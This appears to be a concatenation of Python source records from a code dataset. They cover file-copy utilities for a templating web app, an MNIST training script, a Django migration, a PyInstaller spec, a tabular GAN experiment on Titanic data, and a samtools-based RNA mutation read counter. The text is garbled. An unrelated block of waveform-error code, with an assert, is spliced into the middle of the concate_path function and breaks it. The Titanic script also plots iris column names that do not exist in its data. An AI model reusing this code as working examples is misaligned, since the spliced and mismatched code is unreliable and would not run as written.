'/'.join(file_path.split('/')[1:])\n file_name = file_path.split('/')[-1].split('.')[0]\n file_ext = file_path.split('/')[-1].split('.')[1]\n new_file_name = file_name + '_old.' + file_ext\n f_list = file_path.split('/')[:-1]\n f_list.append(new_file_name)\n new_file_path = '/'.join(f_list)\n return path.join(_base_path, file_path), path.join(_base_path, new_file_path)\n\n\ndef parse_filename(file_path):\n basename = os.path.basename(file_path)\n filename, file_extension = os.path.splitext(basename)\n dirname = os.path.dirname(file_path)\n return dirname, filename, file_extension\n\n\ndef backup_file(file_path):\n basename = os.path.basename(file_path)\n dirname = os.path.dirname(file_path)\n filename, file_extension = os.path.splitext(basename)\n old_filename = ''.join([filename + \"_old\", file_extension])\n old_path = os.path.join(dirname, old_filename)\n if os.path.exists(file_path):\n shutil.copy(file_path, old_path)\n return True\n\n\ndef get_file_list(user, folder):\n res = {'success': False, 'data': '', 'message': '操作失败', 'user': user}\n if not user or not folder:\n return res\n folder_path = os.path.join(USER_FILES_PATH, user, folder)\n _files = os.listdir(folder_path)\n files = [os.path.join('/static', folder, x) for x in _files if \"_old.\" not in x]\n res.update({'data': files})\n res = {'success': True, 'data': '', 'message': '操作成功', 'user': user}\n return json.dumps(res)\n\n\ndef copy_static_files(user, source_path):\n tmp_path = source_path.replace(STATIC_FILES_PATH, '')\n path_suffix = os.path.join(*[x for x in tmp_path.split('/') if x])\n path_prefix = os.path.join(USER_FILES_PATH, user)\n target_path = os.path.join(path_prefix, path_suffix)\n if not os.path.exists(source_path):\n return False\n folder = os.path.dirname(target_path)\n if not os.path.exists(folder):\n os.makedirs(folder)\n shutil.copy(source_path, target_path)\n return True\n\n\ndef concate_path(prefix, suffix, junction=None):\n if not junction:\n junction = [x for x in prefix.split(os.sep) if x][-1]\n suffix_list = [x for x in suffix.split(os.sep) if x]\n 
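# --- Editor's sketch of the waveform error metrics reported above: diastolic pressure
# --- is the cycle minimum, systolic the maximum, pulse pressure their difference, and
# --- MAP is approximated here by the cycle mean:
import numpy as np

def pressure_errors(pred, true):
    pred, true = np.asarray(pred, float), np.asarray(true, float)
    return {
        'dbp': abs(pred.min() - true.min()),
        'sbp': abs(pred.max() - true.max()),
        'pp': abs((pred.max() - pred.min()) - (true.max() - true.min())),
        'map': abs(pred.mean() - true.mean()),
    }

errs = pressure_errors([80, 120, 90], [78, 124, 92])
assert errs['sbp'] == 4.0 and errs['dbp'] == 2.0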
idx = 0\n    if junction in suffix_list:\n        idx = suffix_list.index(junction) + 1\n    _suffix = os.path.join(*suffix_list[idx:])\n    absolute_path = os.path.join(prefix, _suffix)\n    return absolute_path\n\n\ndef map_to_user_folder(user, source_path):\n    \"\"\"\n    Map a public template path to the corresponding user folder\n    :param user:\n    :param source_path:\n    :return:\n    \"\"\"\n    _suffix = os.path.join(*source_path.replace(STATIC_FILES_PATH, '').split(os.sep))\n    target_path = os.path.join(USER_FILES_PATH, user, _suffix)\n    return target_path\n\n\ndef parse_category(absolute_path, identifier=\"web/html\", is_html=True):\n    splits = os.path.join(*[x for x in absolute_path.split(identifier)[-1].split(os.sep) if x])\n    if is_html:\n        category = os.path.dirname(splits)\n    else:\n        category = os.path.join(*splits.rsplit('.', 1)[:-1])\n    return category\n\n\ndef get_links(path):\n    \"\"\"\n    Get the access links of the files under the given folder\n    :param path:\n    :return:\n    \"\"\"\n    static_files = ['html', 'css', 'js', 'images', 'web', 'app']\n    absolute_path_list = []\n    urls = []\n    for (dir_path, a, files) in os.walk(path):\n        if files:\n            absolute_path_list.extend([os.path.join(dir_path, x) for x in files])\n    for apl in absolute_path_list:\n        if apl.startswith(USER_FILES_PATH):\n            apl = apl.replace(USER_FILES_PATH, '')\n            apl_list = [x for x in apl.split('/') if x][1:]\n        else:\n            apl = apl.replace(STATIC_FILES_PATH, '')\n            apl_list = [x for x in apl.split('/') if x]\n        _url = os.path.join('/static', *apl_list)\n        if _url.endswith('html'):\n            urls.append(_url)\n    return urls\n\n\ndef get_absolute_path_by_url(_url, user=None):\n    \"\"\"\n    Get the file path of a template from its link\n    :param _url:\n    :param user:\n    :return:\n    \"\"\"\n    if user:\n        path_prefix = os.path.join(USER_FILES_PATH, user)\n    else:\n        path_prefix = STATIC_FILES_PATH\n    if _url.startswith('/static/') or _url.startswith('static/'):\n        path_suffix = os.path.join(*[x for x in _url.split('/') if x][1:])\n        path = os.path.join(path_prefix, path_suffix)\n        if not os.path.exists(path):\n            path = os.path.join(STATIC_FILES_PATH, path_suffix)\n            if not os.path.exists(path):\n                return ''\n        return path\n\n\ndef related_static_files(html_path):\n    pass\n\n\ndef copy_templates_by_config(user, config_file):\n    paths = []\n    config = get_config(user, config_file)\n    if not config or not user:\n        return {\"success\": False, \"info\": \"template does not exist\", 'user': user}\n    try:\n        pages = config['web_module'].keys()\n        modules = config['web_module']['index']['body']\n        for ms in modules:\n            link = ms.values()[0]['url']\n            absolute_path = get_absolute_path_by_url(link)\n            if os.path.exists(absolute_path):\n                paths.append(absolute_path)\n                target_path = map_to_user_folder(user, absolute_path)\n                copy_with_create_dir(absolute_path, target_path)  # copy the template\n                module_file_name = os.path.splitext(os.path.basename(absolute_path))[0]\n\n                # copy images\n                images_folder = os.path.join(STATIC_FILES_PATH, 'images', parse_category(absolute_path),\n                                             module_file_name)\n                if os.path.exists(images_folder):\n                    copy_folder(images_folder, map_to_user_folder(user, images_folder))\n        # copy css files\n        css_folder = os.path.join(STATIC_FILES_PATH, 'css')\n        if os.path.exists(css_folder):\n            copy_folder(css_folder, map_to_user_folder(user, css_folder))\n        # copy js files\n        js_folder = os.path.join(STATIC_FILES_PATH, 'js')\n        if os.path.exists(js_folder):\n            copy_folder(js_folder, map_to_user_folder(user, js_folder))\n        res = {\"success\": True, \"message\": \"Operation succeeded\"}\n    except Exception as e:\n        res = {\"success\": False, \"message\": \"Operation failed\", \"info\": str(e)}\n    return res\n\n\n\"\"\"\ncopy\n\"\"\"\n\n\ndef copy_with_create_dir(source, target):\n    if not 
os.path.exists(source):\n        return False\n\n    folder = os.path.dirname(target)\n    if not os.path.exists(folder):\n        os.makedirs(folder)\n    shutil.copy(source, target)\n    return True\n\n\ndef copy_by_paths(paths, to_dir):\n    try:\n        if not os.path.exists(to_dir):\n            os.makedirs(to_dir)\n        for p in paths:\n            if os.path.exists(p):\n                shutil.copy(p, to_dir)\n        return True\n    except Exception as e:\n        return False\n\n\ndef copy_folder(source, target):\n    if not os.path.exists(source):\n        return False\n    dir_util.copy_tree(source, target)\n    return True\n\n\ndef copy_by_template(client, token, user_dir):\n    client = client if client else 'web'\n    now = datetime.now().strftime('%Y%m%d%H%M%S')\n    old_project_path = os.path.join(user_dir, client, 'project')\n    new_project_path = os.path.join(user_dir, client, 'project-' + now)\n    if os.path.exists(old_project_path):\n        os.rename(old_project_path, new_project_path)\n    dir_util._path_created = {}\n    images_dir = os.path.join(STATIC_FILES_PATH, 'images', 'templates', token)\n    images_target = os.path.join(user_dir, client, 'project', 'static', 'images', token)\n    js_dir = os.path.join(STATIC_FILES_PATH, 'js/lib')\n    user_images_dir = os.path.join(user_dir, 'images')\n    if os.path.exists(user_images_dir):\n        user_images_folder = os.path.join(user_dir, client, 'project', 'static', 'images')\n        copy_folder(user_images_dir, user_images_folder)\n    if os.path.exists(images_dir):\n        copy_folder(images_dir, images_target)\n    if os.path.exists(js_dir):\n        copy_folder(js_dir, os.path.join(user_dir, client, 'project/static/js/lib'))\n\n\ndef read_static_file(user, static_url):\n    static_path_list = [x for x in static_url.split(os.sep) if x]\n    if static_path_list[0] == 'static':\n        static_path_list.pop(0)\n    _static_path = os.path.join(*static_path_list)\n    user_absolute_path = os.path.join(USER_FILES_PATH, _static_path)\n    content = \"\"\n    if os.path.exists(user_absolute_path):\n        content = open(user_absolute_path, 'r').read()\n        return content\n    absolute_path = os.path.join(STATIC_FILES_PATH, _static_path)\n    if os.path.exists(absolute_path):\n        content = open(absolute_path, 'r').read()\n    return content\n\n\nif __name__ == \"__main__\":\n    pass\n","sub_path":"util/file_utils.py","file_name":"file_utils.py","file_ext":"py","file_size_in_byte":9342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"382000134","text":"import numpy as np\nimport tensorflow as tf\nimport tensorlayer as tl\n\nsess = tf.InteractiveSession()\n\nfeat_train, lab_train, feat_valid, lab_valid, feat_test, lab_test = tl.files.load_mnist_dataset(shape=(-1,784))\n\ninput_feature = tf.placeholder(tf.float32, [None,784] , name='input_feature')\ninput_label = tf.placeholder(tf.int64, [None,], name='input_label')\n\n# print(type(input_feature)) # <class 'tensorflow.python.framework.ops.Tensor'>\n# print(input_feature._shape) # (?, 784)\n\nnetwork = tl.layers.InputLayer(inputs = input_feature, name ='input_layer')\n#print(network.all_layers) # []\n#print(network.all_params) # []\n#print(network.all_drop) # {}\n\n#print(type(network))\n\nnetwork = tl.layers.DropoutLayer(network, keep=0.8, name='dropout_layer_1')\n#print(network.all_layers) # [<dropout output tensor>]\n#print(network.all_params) # []\n#print(network.all_drop) # {<keep-prob placeholder>: 0.8}\n\nnetwork = tl.layers.DenseLayer(network, n_units=800,act = tf.nn.relu, name='dense_relu_1')\n#print(network.all_layers) # [<dropout output tensor>, <dense output tensor>]\n#print(network.all_params) # [<W of dense_relu_1>, <b of dense_relu_1>]\n#print(network.all_drop) # {<keep-prob placeholder>: 0.8}\n\nnetwork = tl.layers.DropoutLayer(network, keep=0.5, name='dropout_layer_2')\n#print(type(network))
\n\nnetwork = tl.layers.DenseLayer(network, n_units=800,act = tf.nn.relu, name='dense_relu_2')\n#print(type(network))\n\nnetwork = tl.layers.DropoutLayer(network, keep=0.5, name='dropout_layer_3')\n#print(type(network))\n\nnetwork = tl.layers.DenseLayer(network, n_units=10, act = tf.identity, name='output_layer')\n#print(type(network))\n\npredict_label = network.outputs\n#print(type(predict_label))\n\n#print(predict_label._shape) # (?, 10)\n#print(input_label._shape) # (?,)\ncost = tl.cost.cross_entropy(predict_label, input_label) \n#print(type(cost))\n\ntrain_params = network.all_params\n#print(train_params) # [<W and b variables of the three dense layers, six in total>]\noptimizer = tf.train.AdamOptimizer(0.0001).minimize(cost, var_list=train_params)\n\ncorrect = tf.equal(tf.argmax(predict_label, 1), input_label)\naccuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\n\nsess.run(tf.initialize_all_variables())\n\nnetwork.print_params()\nnetwork.print_layers()\n\ntl.utils.fit(sess, network, optimizer, cost, feat_train, lab_train, input_feature, input_label,\n            acc=accuracy, batch_size=500, n_epoch=500, print_freq=5,\n            X_val=feat_valid, y_val=lab_valid, eval_train=True)\n\ntl.utils.test(sess, network, accuracy, feat_test, lab_test, input_feature, input_label, batch_size=None, cost=cost)\n\ntl.files.save_npz(network.all_params , name='model.npz')\n\nsess.close()","sub_path":"Basic/mnist_simple.py","file_name":"mnist_simple.py","file_ext":"py","file_size_in_byte":3616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"543778538","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('vcard', '0014_project_description'),\n    ]\n\n    operations = [\n        migrations.RemoveField(\n            model_name='projecttag',\n            name='alias',\n        ),\n        migrations.AddField(\n            model_name='projecttag',\n            name='url_name',\n            field=models.SlugField(default='some-url-name', max_length=255),\n            preserve_default=False,\n        ),\n        migrations.AlterField(\n            model_name='project',\n            name='url_name',\n            field=models.SlugField(max_length=255, unique=True),\n        ),\n    ]\n","sub_path":"vcard/migrations/0015_auto_20160618_0816.py","file_name":"0015_auto_20160618_0816.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"341304278","text":"# -*- mode: python ; coding: utf-8 -*-\n\n# Build empress as macOS app bundle\n\nblock_cipher = None\n\n\na = Analysis(['../empress_gui.py'],\n             pathex=['pyinstaller_spec'],\n             binaries=[],\n             datas=[(\"../assets\", \"./assets\")],\n             # pkg_resources.py2_warn hidden import needed if setuptools>=45.0.0\n             # https://github.com/pypa/setuptools/issues/1963#issuecomment-574265532\n             hiddenimports=['pkg_resources.py2_warn'],\n             hookspath=[],\n             runtime_hooks=[],\n             excludes=[],\n             win_no_prefer_redirects=False,\n             win_private_assemblies=False,\n             cipher=block_cipher,\n             noarchive=False)\npyz = PYZ(a.pure, a.zipped_data,\n          cipher=block_cipher)\nexe = EXE(pyz,\n          a.scripts,\n          [],\n          exclude_binaries=True,\n          name='empress_gui',\n          debug=False,\n          bootloader_ignore_signals=False,\n          strip=False,\n          upx=True,\n          console=False )\ncoll = COLLECT(exe,\n               a.binaries,\n               a.zipfiles,\n               a.datas,\n               strip=False,\n               upx=True,\n               upx_exclude=[],\n               name='empress')\napp = BUNDLE(coll,\n             name='empress.app',\n             icon=None,\n             bundle_identifier=None,\n             info_plist={\n                 'NSPrincipalClass': 'NSApplication', # Enable retina display\n                 
'CFBundleName': 'Empress DTL Computational Biology Tool', # Enable Siri\n }\n )\n","sub_path":"pyinstaller_spec/empress_gui_app.spec","file_name":"empress_gui_app.spec","file_ext":"spec","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"528747563","text":"import configs.titanic as cfg\nfrom utils.utils import *\nfrom utils.data_loading import load_processed_dataset\nimport os\nfrom CSDGAN.classes.tabular.TabularCGAN import TabularCGAN\nfrom CSDGAN.classes.tabular.TabularDataset import TabularDataset\nfrom torch.utils import data\nimport pickle as pkl\nimport random\n\n# Set random seem for reproducibility\nprint(\"Random Seed: \", cfg.MANUAL_SEED)\nrandom.seed(cfg.MANUAL_SEED)\ntorch.manual_seed(cfg.MANUAL_SEED)\n\n# Ensure directory exists for outputs\nexp_path = os.path.join(\"experiments\", cfg.EXPERIMENT_NAME)\nos.makedirs(exp_path, exist_ok=True)\n\n# Import data\ntitanic = load_processed_dataset('titanic')\n\n# Automatically determine these parameters and complete preprocessing\ndevice = torch.device(\"cuda:0\" if (torch.cuda.is_available()) else \"cpu\")\n\n# Instantiate data set and generator\ndataset = TabularDataset(df=titanic,\n dep_var=cfg.DEP_VAR,\n cont_inputs=cfg.CONT_INPUTS,\n int_inputs=cfg.INT_INPUTS,\n test_size=cfg.TEST_SIZE,\n seed=cfg.MANUAL_SEED)\ndataset.to_dev(device)\ndata_gen = data.DataLoader(dataset, **cfg.TRAINING_PARAMS)\n\n# Define GAN\nCGAN = TabularCGAN(data_gen=data_gen,\n device=device,\n path=exp_path,\n seed=cfg.MANUAL_SEED,\n eval_param_grid=cfg.EVAL_PARAM_GRID,\n eval_folds=cfg.EVAL_FOLDS,\n test_ranges=cfg.TEST_RANGES,\n eval_stratify=dataset.eval_stratify,\n **cfg.CGAN_INIT_PARAMS)\n\n# Eval on real data\nscore_real = train_test_logistic_reg(x_train=dataset.x_train.numpy(),\n y_train=dataset.y_train.numpy(),\n x_test=dataset.x_test.numpy(),\n y_test=dataset.y_test.numpy(),\n param_grid=cfg.EVAL_PARAM_GRID,\n cv=cfg.EVAL_FOLDS,\n random_state=cfg.MANUAL_SEED,\n labels_list=dataset.labels_list,\n verbose=True)\n\n# Train GAN\nCGAN.train_gan(num_epochs=cfg.NUM_EPOCHS, cadence=cfg.CADENCE, print_freq=cfg.PRINT_FREQ, eval_freq=cfg.EVAL_FREQ)\n\n# Load best-performing GAN\nCGAN.load_netG(best=True)\n\n# Fit another model to double-check results\nCGAN.test_model(stratify=CGAN.eval_stratify)\n\n# Save GAN\nwith open(os.path.join(exp_path, \"CGAN.pkl\"), 'wb') as f:\n pkl.dump(CGAN, f)\n\n# Visualizations\nCGAN.plot_progress(benchmark_acc=score_real, show=True, save=exp_path)\nCGAN.plot_training_plots(show=True, save=exp_path)\nCGAN.netG.plot_layer_scatters(title=\"Generator\", show=True, save=exp_path)\nCGAN.netD.plot_layer_scatters(title=\"Discriminator\", show=True, save=exp_path)\nCGAN.netG.plot_layer_hists(title=\"Generator\", show=True, save=exp_path)\nCGAN.netD.plot_layer_hists(title=\"Discriminator\", show=True, save=exp_path)\n\ngenned_df = CGAN.gen_data(size=cfg.TEST_RANGES[3], stratify=dataset.eval_stratify)\nplot_scatter_matrix(df=genned_df, cont_inputs=cfg.CONT_INPUTS, title=\"Fake Data\", scaler=None, show=True, save=exp_path)\nplot_scatter_matrix(df=titanic, cont_inputs=cfg.CONT_INPUTS, title=\"Real Data\", scaler=None, show=True, save=exp_path)\n\ncompare_cats(real_df=titanic, fake_df=genned_df, x='Sex', y='Survived', hue='Pclass', show=True, save=exp_path)\n\nplot_conditional_scatter(col1='sepal_len',\n col2='sepal_wid',\n real_df=titanic,\n fake_df=genned_df,\n dep_var=cfg.DEP_VAR,\n cont_inputs=cfg.CONT_INPUTS,\n labels_list=dataset.labels_list,\n 
scaler=None,\n alpha=0.25,\n show=True,\n save=exp_path)\n\nplot_conditional_density(col='petal_len',\n real_df=titanic,\n fake_df=genned_df,\n dep_var=cfg.DEP_VAR,\n cont_inputs=cfg.CONT_INPUTS,\n labels_list=dataset.labels_list,\n scaler=None,\n show=True,\n save=exp_path)\n","sub_path":"notebooks/prototypes/titanic/titanic_v2.py","file_name":"titanic_v2.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"295740262","text":"import lab7a\n\ndb = [[['författare', ['john', 'zelle']],\n ['titel', ['python', 'programming', 'an', 'introduction', 'to',\n 'computer', 'science']],\n ['år', 2010],\n ['genre', \"programmering\"]],\n [['författare', ['armen', 'asratian']],\n ['titel', ['diskret', 'matematik']],\n ['år', 2012],\n ['genre', \"matematik\"]],\n [['författare', ['j', 'glenn', 'brookshear']],\n ['titel', ['computer', 'science', 'an', 'overview']],\n ['år', 2011],\n ['genre', \"matematik\"]],\n [['författare', ['john', 'zelle']],\n ['titel', ['data', 'structures', 'and', 'algorithms', 'using', 'python',\n 'and', 'c++']],\n ['år', 2009],\n ['genre', \"programmering\"]],\n [['författare', ['anders', 'haraldsson']],\n ['titel', ['programmering', 'i', 'lisp']],\n ['år', 1993],\n ['genre', \"programmering\"]]]\n\n\ndef test():\n expected_results = [[db[0], db[3]], [db[0], db[2]], []]\n\n result = lab7a.search(['författare', ['john', '&']], db)\n assert result == expected_results[0]\n\n result = lab7a.search(['titel', ['--', 'an', '--']], db)\n assert result == expected_results[1]\n\n result = lab7a.search(['år', 2007], db)\n assert result == expected_results[2]\n\n result = lab7a.search([['författare', ['&', '&']], ['titel',\n ['--', 'python', '--']], ['år', \"&\"],\n ['genre', \"programmering\"]], db)\n assert result == expected_results[0]\n\n result = lab7a.search([['författare', ['&', 'zelle']], ['titel',\n ['--', 'python', '--']], ['genre', \"svenska\"]], db)\n assert result == expected_results[2]\n\n result = lab7a.search([], db)\n assert result == expected_results[2]\n\n result = lab7a.search(['genre', \"&\"], db)\n assert result == db\n print(\"Passed all tests\")\n\n\ntest()\n","sub_path":"lab7/testa.py","file_name":"testa.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"475264135","text":"import pandas as pd\nfrom sklearn import ensemble, preprocessing\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.cluster import MiniBatchKMeans, KMeans\n\n\ndata = pd.read_csv('drivers_50000.csv')\n\ndata.at[data['Accidents'] > 0, 'AccidentsBin'] = 1\ndata.at[data['Accidents'] == 0, 'AccidentsBin'] = 0\n\nXX = data[\n ['Age', 'Experience', 'PreviousAccidents', 'RouteDistance', 'Distance', 'HomeLat', 'HomeLng', 'WorkLat', 'WorkLng']]\ny = data['AccidentsBin']\nX = preprocessing.scale(XX)\nfeature_names = XX.columns\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5, random_state=11)\n\ndef show_feature_importances(X, y,feature_names):\n\n rf = ensemble.RandomForestClassifier(random_state=11)\n param_grid = {'n_estimators':[55,75,100],'criterion':[\"entropy\",\"gini\"]}\n grid = GridSearchCV(estimator=rf, param_grid=param_grid, scoring='neg_log_loss')\n grid.fit(X,y)\n best=grid.best_estimator_\n importances = best.feature_importances_\n indices = 
np.argsort(importances)[::-1]\n\n\n    d_first = len(feature_names)\n    plt.figure(figsize=(8, 8))\n    plt.title(\"Feature importances\")\n    plt.bar(range(d_first), importances[indices[:d_first]], align='center')\n    plt.xticks(range(d_first), np.array(feature_names)[indices[:d_first]], rotation=90)\n    plt.xlim([-1, d_first]);\n    plt.show()\n\nshow_feature_importances(X_train,y_train,feature_names)\n\n\ndef cluster_locations(data_input,n_clusters=10):\n    homeLoc = data[['HomeLat', 'HomeLng']].values\n    workLoc = data[['WorkLat','WorkLng']].values\n    k_means_home = KMeans(init='k-means++', n_clusters=n_clusters, n_init=10)\n    k_means_home.fit(homeLoc)\n    k_means_work = KMeans(init='k-means++', n_clusters=n_clusters, n_init=10)\n    k_means_work.fit(workLoc)\n    data_input = data_input.assign(work=pd.Series(k_means_work.labels_, dtype=\"category\"))\n    data_input = data_input.assign(home=pd.Series(k_means_home.labels_, dtype=\"category\"))\n    data_input = data_input.drop(['WorkLat', 'WorkLng', 'HomeLat', 'HomeLng'], axis=1)\n    data_input = data_input.dropna()\n    home_work_vector = pd.get_dummies(data_input[['home', 'work']])\n    data_input = data_input.drop(['home','work'],axis=1)\n    data_input= pd.concat([data_input, home_work_vector], axis=1)\n    return data_input\n\ndata=cluster_locations(data)\nprint(data.info())\nXX = data.drop(['AccidentsBin','Accidents','Skill','RushFactor'],axis=1)\ny = data['AccidentsBin']\nX = preprocessing.scale(XX)\nfeature_names = XX.columns\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5, random_state=11)\n\nshow_feature_importances(X_train,y_train,feature_names)","sub_path":"feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"205436766","text":"### pickler.py\n### the pickle module can save objects to a binary file\n### this is called SERIALIZATION.\n### the file can be 'unpickled' to retrieve the object.\n\nimport pickle\n\ndef main():\n\n    states = {'FL':'Tallahassee','GA':'Atlanta',\n              'NY':'New York','CA':'Sacramento',\n              'OH':'Columbus','NH':'Concord'}\n\n    # serialize the dictionary to a binary file\n    with open('states.dat', 'wb') as outfile:\n        pickle.dump(states, outfile)\n\n    # unpickle the file to retrieve the object\n    with open('states.dat', 'rb') as infile:\n        restored = pickle.load(infile)\n    print(restored)\n\nmain()\n","sub_path":"Week 3 Files/dicts 510/pickler.py","file_name":"pickler.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"463484582","text":"#! /usr/bin/env python3\n\n\"\"\"\nThe program checks bam or cram from the filename.\n\"\"\"\n\nfrom pathlib import Path\nimport pysam\nimport subprocess\n\n\ndef juncmut_supportread_count(input_file, output_file, bam_file, reference):\n\n\n    def check_read(read):\n\n        check_flag = True \n\n        # get the flag information\n        flags = format(int(read.flag), \"#014b\")[:1:-1]\n\n        # skip unmapped read \n        if flags[2] == \"1\" or flags[3] == \"1\": check_flag = False\n        \n        # skip supplementary alignments\n        if flags[8] == \"1\" or flags[11] == \"1\": check_flag = False\n\n        # skip duplicated reads\n        if flags[10] == \"1\": check_flag = False\n\n        return(check_flag)\n\n    \n    def tidy_reads(seq, qualities, read_ids, mut_mut):\n        import re\n        read_id_list = read_ids.split(',')\n        proc = \"\"\n        Q = 15\n        pos_read_id_list = []\n        seq_length = len(seq)\n        baseIndex = 0\n        # modify seq to 1 base presented by a char.\n        while baseIndex < seq_length:\n            #A ’>’ or ’<’ for a reference skip.\n            # The deleted bases will be presented as ‘*’ in the following lines. 
\n if seq[baseIndex] == '>' or seq[baseIndex] == '<' or seq[baseIndex] == '*' :\n proc = proc + seq[baseIndex]\n baseIndex += 1 \n #A '^' the end or start of read, following the quality and the base.\n elif seq[baseIndex] == '^':\n proc = proc + seq[baseIndex+2]\n baseIndex += 3\n #A '$' is the last position of read. \n elif seq[baseIndex] == '$':\n baseIndex += 1\n #\\+[0-9]+[bases] or -[0-9]+[bases] means the deletion and the insertion. For example, +2AG means insertion of AG in the forward strand\n elif seq[baseIndex] == '+' or seq[baseIndex] == '-':\n indel_length = re.search(r'\\d+', seq[baseIndex:]).group()\n baseIndex += len(str(indel_length))+int(indel_length)+1 \n else:\n proc = proc + seq[baseIndex]\n baseIndex += 1\n \n # quality and base check. extract id.\n for i in range(0, len(proc),1):\n if proc[i].upper() == mut_mut:\n if (ord(qualities[i])-33) > Q:\n pos_read_id_list.append(read_id_list[i])\n \n return pos_read_id_list\n\n b_path = Path(bam_file)\n\n if b_path.suffix == '.bam':\n bamfile = pysam.AlignmentFile(bam_file, 'rb')\n if b_path.suffix == '.cram':\n bamfile = pysam.AlignmentFile(bam_file, 'rc')\n \n ## start \n hout = open(output_file, 'w') \n header = [\"Mut_key\", \"SJ_key\", \"Sample\", \"SJ_Type\", \"SJ_Strand\", \"SJ_Read_Count\", \"SJ_Depth\", \"SJ_Freq\",\n \"Ref_Motif\", \"Possivle_Alt_Motif\",\"Possible_Alt_key\", \"Is_GT/AG\", \"Is_in_exon\",\"SJ_Overlap_Count\", \n \"Chr\",\"Mut_Pos\", \"Mut_Ref\", \"Mut_Alt\", \"Mut_Count\", \"Mut_Depth\", \"Mut_Freq\",\n \"Realign_No_SJ_Neg\", \"Realign_No_SJ_Pos\", \"Realign_Target_SJ_Neg\", \"Reaglin_Target_SJ_Pos\",\n \"Realign_Normal_SJ_Neg\", \"Realign_Normal_SJ_Pos\",\"Realign_result\",\"support_read_rmdup\",\"RNA_Mut\"]\n print('\\t'.join(header), file = hout)\n # for each row.\n with open(input_file, 'r') as hin:\n next(hin)\n for line in hin:\n lie = line.rstrip('\\n')\n F = line.rstrip('\\n').split('\\t')\n # Is a position of mutation in Exon or Intron\n if F[-1] != \"True\": continue\n #print(lie + \"\\t0\\tFalse\", file = hout) \n else:\n #mpileup\n mut_elm = F[0].split(',')\n mut_chr = mut_elm[0]\n mut_pos = str(mut_elm[1])\n mut_mut = mut_elm[3]\n #samtools mpileup -r chr4:162087015-162087015 -f /Volumes/NIIDA_SSD1R/genome DRR016694.Aligned.sortedByCoord.out.bam\n mpileup_commands = [\"samtools\", \"mpileup\", \"-r\", mut_chr+\":\"+mut_pos+\"-\"+mut_pos, \"-f\", reference, bam_file, \"--output-QNAME\", \"-o\", output_file + \".tmp1.txt\"]\n subprocess.run(mpileup_commands)\n \n # extract read id with mutations.\n pos_read_list = []\n with open(output_file + \".tmp1.txt\", 'r') as tin:\n for line in tin: \n col = line.rstrip('\\n').split('\\t')\n bases = col[4]\n qualities = col[5]\n read_ids = col[6]\n \n reads_with_mut_list = tidy_reads(bases, qualities, read_ids, mut_mut)\n \n for read in bamfile.fetch(region = str(mut_chr) + ':' + str(mut_pos) + '-' + str(mut_pos)):\n if not check_read(read): continue\n else:\n if read.qname in reads_with_mut_list:\n pos_read = str(read.reference_start) + '_' + str(read.reference_end) + '_' + str(read.next_reference_start) \n pos_read_list.append(pos_read)\n support_read_rmdup = len(set(pos_read_list))\n if support_read_rmdup >= 2:\n rna_mut = \"True\"\n print(lie + \"\\t\"+ str(support_read_rmdup) + \"\\t\" + str(rna_mut), file = hout) \n #else: rna_mut = \"False\"\n \n #print(lie + \"\\t\"+ str(support_read_rmdup) + \"\\t\" + str(rna_mut), file = hout) \n \n Path(output_file + \".tmp1.txt\").unlink()\n\n bamfile.close()\n hout.close()\n\n \n\nif __name__ == 
\"__main__\":\n \n import argparse\n \n parser = argparse.ArgumentParser() #make a parser\n \n parser.add_argument(\"-input_file\", metavar = \"input_file\", default = None, type = str,\n help = \"input file\") \n parser.add_argument(\"-output_file\", metavar = \"output_file\", default = None, type = str,\n help = \"output files\") \n parser.add_argument(\"-bam_file\", metavar = \"bam_file\", default = None, type = str,\n help = \"output files\") \n parser.add_argument(\"-reference\", metavar = \"reference\", default = None, type = str,\n help = \"reference\") \n args = parser.parse_args()\n \n input_file = args.input_file\n output_file = args.output_file\n bam_file = args.bam_file\n reference = args.reference\n \n juncmut_supportread_count(input_file, output_file, bam_file, reference)\n \n\"\"\"\ntidy_bases(bases, qualities)\nbases = \"<<>><>><><><<<<>><<>>>>>>G>>><>>>><<>>>><>><<>>>>>>>>>CCC\"\nqualities =\t\"FFmcFllHDJmJJJJHsIJJiFJI7JmJGJJJk>JJJsJJIFJCDH7FFFDFDFJFF\"\n\"\"\"\n\n\n","sub_path":"juncmut/juncmut_supportread_count.py","file_name":"juncmut_supportread_count.py","file_ext":"py","file_size_in_byte":6763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"125765791","text":"# Reference: http://hexo.tanglei.name/blog/aprioriall-algorithm-in-python.html\n# Reference: https://blog.csdn.net/tszw1007/article/details/77871133\nimport copy\nimport math\nimport re\n\ndef getSubSets(items, remove_origin=False):\n # the power set of the empty set has one element, the empty set\n result = [[]]\n for x in items:\n result.extend([subset + [x] for subset in result])\n if(remove_origin):\n result.pop()\n result.remove([])\n return result\n\nclass Basket():\n items=[]#Apple,orange,....\n def __init__(self,items):\n self.items = items\n def setItems(self,items):\n self.items = items\n def __str__(self):\n mystr='Basket[ '\n for i in self.items:\n mystr = mystr + i +' , '\n mystr += ']'\n return mystr\n \nclass Custom():\n baskets=[]#basket1,basket2\n 